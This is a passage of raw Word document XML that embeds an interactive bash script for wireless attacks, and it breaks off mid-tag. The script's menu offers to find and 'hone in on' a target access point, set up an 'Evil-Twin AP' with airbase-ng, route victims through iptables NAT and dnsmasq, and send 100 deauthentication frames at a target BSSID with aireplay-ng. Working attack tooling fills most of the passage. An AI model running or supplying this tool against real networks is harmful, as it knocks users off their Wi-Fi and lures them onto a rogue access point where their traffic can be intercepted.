      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MAC(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>client connected to target AP)[optional]: "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5171416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read </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>etHost</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="00E78569"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if [ -z $</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>etHost ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF5B0F6"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 xml:space="preserve">echo "Host MAC not </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>set</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0892A078"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else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C22C50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options3="$options3 -h $etHost"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CED888A"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fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9BFEA9"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"Enter any other options (refer to man airbase-ng</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>...)[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>optional]:"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E855BC8"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read </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>otherOptions</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1D1EDEF3"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if [ -z $</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>otherOptions ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445BDB35"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echo "No other options set"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F54C4F"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else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677D342F"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options3="$options3 $otherOptions"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4947E5D6"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fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664918C2"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sleep 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D47B866"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"Killing Airbase-ng..."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6379E670"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pkill airbase-ng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568A382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sleep </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0F99AF8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"Killing DHCP..."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15EF82B8"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pkill dhcpd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20769AEC"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sleep </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>5;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="01220D8E"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$options3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126EAE72"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lastRenderedPageBreak/>
        <w:tab/>
        <w:t>echo "Starting Fake AP..."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B270530"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sudo airbase-ng $options3 $interface   &amp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62FEC323"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"Initiating at0 interface"</w:t>
      </w:r>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6290FCD0"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ifconfig at0 up</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3FB55D"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ifconfig at0 10.0.0.1 netmask 255.255.255.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1DB003"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route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF64D69"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iptables -P FORWARD ACCEPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0704ABC3"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iptables -t nat -A POSTROUTING -o wlan0mon -j MASQUERADE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593DF98E"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echo 1 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;  /</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>proc/sys/net/ipv4/ip_forward</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399BB2C0"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dnsmasq -C dnsmasq.conf -d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25253463"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F577C2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function option4</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(){</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7A41C05F"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deauthType=''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477DFA2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while [ -z $</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>deauthType ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>; do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F30EA0"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echo "Would you like to run a basic deauth attack? (--deauth 100)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7584E325"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echo "[1] Yes"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060AE62D"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echo "[2] No"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2CF6D4"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 xml:space="preserve">read </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>deauthType</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="370622D8"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done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01738DD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"you selected $</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>deauthType</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49143A2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if [ $deauthType = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1 ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2806EE7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sudo aireplay-ng --deauth 100 -a $bssid $interface &amp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF70E7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fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF1DC45"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p>
    <w:p w14:paraId="059C0708"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if [ $deauthType = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2 ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC667B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 xml:space="preserve">echo "Enter your aireplay-ng options, you must add the -a tag, and DO NOT include the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>interface</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F85BEF5"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 xml:space="preserve">read </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>options4</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="58FB90EC"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sudo aireplay-ng $options4 $interface &amp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F3985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fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D28C71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wait</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106B2DCE"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC8E6E3"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function option5</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(){</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="084E955E"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"Killing airbase-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ng</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C4F736"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pkill airbase-ng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244CB812"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sleep 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3E6222"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echo "Killing </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dhcpd</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A4772C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pkill dhcpd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120B915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sleep 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D29369"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"Killing aireplay-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ng</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096E0BD3"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pkill aireplay-ng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC8479C"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sleep 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67702115"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lastRenderedPageBreak/>
        <w:tab/>
        <w:t>echo "Killing airodump-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ng</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B214A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pkill airodump-ng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71CFCF7E"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sleep 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C57F9C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"sleeping..."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66161B6F"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sleep 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792770D9"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exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79213AE0"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ADCA1EF"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 xml:space="preserve">function </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>menu(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3CF95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"What would you like to do?"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3737065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echo "[0] set up </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>interface</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54FB92E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echo "[1] find the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>target</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5240349C"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echo "[2] </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hone in on</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> target"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042F2C74"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echo "[3] set up Evil-Twin </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>AP</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C90136"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"[4] deauth the target AP"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A402864"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echo "[5] exit"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5A71DF"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read </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>userInput</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2ACF6748"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p>
    <w:p w14:paraId="71BA04E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p>
    <w:p w14:paraId="085A0FC5"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021BBEEE"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 xml:space="preserve">function </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>userAction(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
